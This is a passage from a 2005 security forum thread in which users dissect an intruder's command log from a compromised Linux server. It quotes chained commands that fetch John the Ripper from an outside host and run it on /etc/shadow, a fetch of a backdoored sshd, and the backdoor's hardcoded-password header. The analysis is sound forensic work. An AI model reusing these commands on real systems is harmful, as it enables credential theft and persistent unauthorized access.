To register for an Internet.com membership to receive newsletters and white papers, use the Register button ABOVE.
To participate in the message forums BELOW, click here


EIT Planet's Security News
 Symantec Warns of New Security Breach
 Security Vulnerabilities Prove Increasingly Costly

Security Products
 Disk Encryption Software Cryptic Disk (Disk Encryption Software)
 Recover Excel VBA Password (VBA Password Remover)
 VBA Excel Password Recovery (VBA Password Remover)
 VBA Project Password Recovery (VBA Password Remover)
 Outlook Password Unmask (Outlook Password Unmask)
 TextEgg Simple Encryption Software (Schimple Software Ltd)


Go Back   Antionline Forums - Maximum Security for a Connected World > Security Discussions > *nix Security Discussions

*nix Security Discussions Security issues related to *nix & *nix apps.

Reply
 
Thread Tools Display Modes
Old August 30th, 2005, 07:27 PM   #21
rowdy_yates
Senior Member
 
Join Date: Dec 2004
Posts: 137
rowdy_yates is a name known to allrowdy_yates is a name known to allrowdy_yates is a name known to allrowdy_yates is a name known to allrowdy_yates is a name known to allrowdy_yates is a name known to all
Hi, I have a dumb question.

Quote:
pico genx.h
pico genx.h
pico ssh2includes.h
why did he edit this?


also, so he got in via a weak web account that was allowed to telnet and/or ssh?
rowdy_yates is offline   Reply With Quote
Old August 30th, 2005, 08:36 PM   #22
zipc0de
Junior Member
 
Join Date: Mar 2003
Posts: 14
zipc0de is on a distinguished road
My knowledge in linux is slowly coming back, but is this interpretation correct?

w
Does a who command to see who is all on the system.

wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow

These commands are broken into parts shown by a seperator(the semicolon). First wget command grabs what I am guessing is john the ripper or another password cracker. Second command is to basically unzip the file in windows terms. Then he removes the original zipped up archive. Changes the directory and makes the exe. Next command changes directory to the executable file. Then the ./ runs the program on /etc/shadow. This would make me assume that he already had root from the exploit, but probably would rather have a valid account for later use.

wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh

Gets a file which I am guessing is a SSH server either whole because the target server didn't have the files installed or a hacked up version for his use.

The rest of it is pretty much setting up the backdoor and cleaning up a little.

That is just my interpretation of it broken down into tiny bits. Please point out any faulty points in my logic though cause I really need to get my linux skills back.
zipc0de is offline   Reply With Quote
Old August 30th, 2005, 08:46 PM   #23
thehorse13
Master-Jedi-Pimps0r & Moderator
 
thehorse13's Avatar
 
Join Date: Dec 2002
Location: Washington D.C. area
Posts: 2,868
thehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond reputethehorse13 has a reputation beyond repute
Requirements will set the framework for security. Personally, I have also seen many apps use wget to grab updates via a daily cron job.
__________________
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
thehorse13 is offline   Reply With Quote
Old August 30th, 2005, 09:27 PM   #24
Maestr0
Senior Member
 
Maestr0's Avatar
 
Join Date: May 2003
Posts: 604
Maestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond reputeMaestr0 has a reputation beyond repute
He downloaded a backdoored version of sshd and used pico to set the password before he compiled it.

genx.h:
Code:
int genx=0,genxlookup=0;
char genxpass[]="toji",genxbuf[1024];
char genxfile[]="/dev/saux";
-Maestr0
__________________
\"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier
Maestr0 is offline   Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump


All times are GMT +1. The time now is 10:41 AM.












Acceptable Use Policy

Internet.com
The Network for Technology Professionals

Search:

About Internet.com

Legal Notices, Licensing, Permissions, Privacy Policy.
Advertise | Newsletters | E-mail Offers

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.